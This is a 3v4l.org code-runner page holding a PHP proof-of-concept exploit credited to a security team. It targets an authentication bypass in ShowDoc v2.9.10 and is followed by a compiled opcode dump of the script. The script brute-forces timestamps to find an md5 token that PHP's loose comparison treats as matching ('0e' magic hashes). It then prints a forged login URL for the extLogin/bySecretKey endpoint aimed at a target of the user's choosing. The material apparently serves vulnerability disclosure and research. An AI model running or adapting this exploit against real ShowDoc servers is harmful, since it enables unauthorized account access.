3v4l.org

run code in 300+ PHP versions simultaneously
<?php
// Credit:Qianxin, Network Security Department, Product-Safety Team ( Unc1e )
// Date:2021/10/13
/*
ShowDoc v2.9.10 Auth Bypass PoC #2:
1) PHP Type Juggling (weak typing), see https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
2) Using that: ('0e111' == '0e222') => (bool)true
3) This script uses brute-forcing to find a possible collision
*/

$username = 's' ; // Forged username
$time = 1694131871 ; //2023-09-08 08:11:11, always valid timestamp
$login_secret_key = '35d0b093f240cf6abedbe85fb174d317'; //a possible bin2hex( random_bytes( 16 ) );


$total = 1000000;
for ($i=0; $i<(1000*$total); $i++){// try to Find solution in 1 Billion numbers!
    $time += 1;
    $token = md5($username.$login_secret_key.$time);
    if (substr($token, 0, 2) === "0e"){
        if(preg_match('/^[0]+e[0-9]+$/', $token)) //0e123, 00e123, ...
        {
            echo "time:$time, while final is: $token".PHP_EOL;
        }
    }

    if (($i % $total) == 0){
        echo "[".($i/$total)."‰]".PHP_EOL;
    }
}

echo "http://[showdoc]/server/?s=/api/extLogin/bySecretKey&username={$username}&time={$time}&token={$token}&redirect=".PHP_EOL;// Please replace the [showdoc] to your target

?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 40
Branch analysis from position: 40
2 jumps found. (Code = 44) Position 1 = 43, Position 2 = 6
Branch analysis from position: 43
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 6
2 jumps found. (Code = 43) Position 1 = 20, Position 2 = 31
Branch analysis from position: 20
2 jumps found. (Code = 43) Position 1 = 25, Position 2 = 31
Branch analysis from position: 25
2 jumps found. (Code = 43) Position 1 = 34, Position 2 = 39
Branch analysis from position: 34
2 jumps found. (Code = 44) Position 1 = 43, Position 2 = 6
Branch analysis from position: 43
Branch analysis from position: 6
Branch analysis from position: 39
Branch analysis from position: 31
Branch analysis from position: 31
filename:       /in/DBlsO
function name:  (null)
number of ops:  53
compiled vars:  !0 = $username, !1 = $time, !2 = $login_secret_key, !3 = $total, !4 = $i, !5 = $token
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   11     0  E >   ASSIGN                                                   !0, 's'
   12     1        ASSIGN                                                   !1, 1694131871
   13     2        ASSIGN                                                   !2, '35d0b093f240cf6abedbe85fb174d317'
   16     3        ASSIGN                                                   !3, 1000000
   17     4        ASSIGN                                                   !4, 0
          5      > JMP                                                      ->40
   18     6    >   ASSIGN_OP                                     1          !1, 1
   19     7        INIT_FCALL                                               'md5'
          8        CONCAT                                           ~12     !0, !2
          9        CONCAT                                           ~13     ~12, !1
         10        SEND_VAL                                                 ~13
         11        DO_ICALL                                         $14     
         12        ASSIGN                                                   !5, $14
   20    13        INIT_FCALL                                               'substr'
         14        SEND_VAR                                                 !5
         15        SEND_VAL                                                 0
         16        SEND_VAL                                                 2
         17        DO_ICALL                                         $16     
         18        IS_IDENTICAL                                             $16, '0e'
         19      > JMPZ                                                     ~17, ->31
   21    20    >   INIT_FCALL                                               'preg_match'
         21        SEND_VAL                                                 '%2F%5E%5B0%5D%2Be%5B0-9%5D%2B%24%2F'
         22        SEND_VAR                                                 !5
         23        DO_ICALL                                         $18     
         24      > JMPZ                                                     $18, ->31
   23    25    >   ROPE_INIT                                     4  ~20     'time%3A'
         26        ROPE_ADD                                      1  ~20     ~20, !1
         27        ROPE_ADD                                      2  ~20     ~20, '%2C+while+final+is%3A+'
         28        ROPE_END                                      3  ~19     ~20, !5
         29        CONCAT                                           ~22     ~19, '%0A'
         30        ECHO                                                     ~22
   27    31    >   MOD                                              ~23     !4, !3
         32        IS_EQUAL                                                 ~23, 0
         33      > JMPZ                                                     ~24, ->39
   28    34    >   DIV                                              ~25     !4, !3
         35        CONCAT                                           ~26     '%5B', ~25
         36        CONCAT                                           ~27     ~26, '%E2%80%B0%5D'
         37        CONCAT                                           ~28     ~27, '%0A'
         38        ECHO                                                     ~28
   17    39    >   PRE_INC                                                  !4
         40    >   MUL                                              ~30     !3, 1000
         41        IS_SMALLER                                               !4, ~30
         42      > JMPNZ                                                    ~31, ->6
   32    43    >   ROPE_INIT                                     7  ~33     'http%3A%2F%2F%5Bshowdoc%5D%2Fserver%2F%3Fs%3D%2Fapi%2FextLogin%2FbySecretKey%26username%3D'
         44        ROPE_ADD                                      1  ~33     ~33, !0
         45        ROPE_ADD                                      2  ~33     ~33, '%26time%3D'
         46        ROPE_ADD                                      3  ~33     ~33, !1
         47        ROPE_ADD                                      4  ~33     ~33, '%26token%3D'
         48        ROPE_ADD                                      5  ~33     ~33, !5
         49        ROPE_END                                      6  ~32     ~33, '%26redirect%3D'
         50        CONCAT                                           ~37     ~32, '%0A'
         51        ECHO                                                     ~37
   34    52      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0

